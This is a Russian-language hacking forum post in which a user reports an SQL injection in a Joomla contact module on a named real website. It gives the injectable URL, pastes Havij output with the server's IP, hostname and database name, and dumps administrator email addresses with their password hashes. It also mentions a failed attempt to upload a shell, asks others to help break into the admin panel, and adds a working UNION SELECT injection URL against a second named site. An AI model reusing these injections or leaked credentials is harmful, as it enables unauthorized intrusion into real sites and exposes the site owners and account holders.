
31.07.2015, 15:33
|
|
Познающий
Регистрация: 31.07.2015
Сообщений: 41
С нами:
5677526
Репутация:
1
|
|
Сообщение от goot
↑
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
И фильтр не пропускает логин админа(((
Код:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Там только перебор бессмысленный сразу инжектировать нужно
Я через софт Havij v1.16 скачал базу
Код:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr
данные админа
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Залить не получилось(( не нашел пути
Кто сможет раскопать отпишите в личку (Как удалось?)
P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))
Хэш очень похож на OpenBSD Blowfish
Логин подозреваю будет Admin
Вот что удалось вытянуть,подозреваю уже кто-то залез в админку
coolxacer@list.ru:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!
povar.admin@gmail.com:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCW Fk4u9wVBkqC!
Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/
Код:
http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Ну и бонусВот интерестная inject. дальше не получатся залезть,если есть идеи в ПМ пож.
|
|
|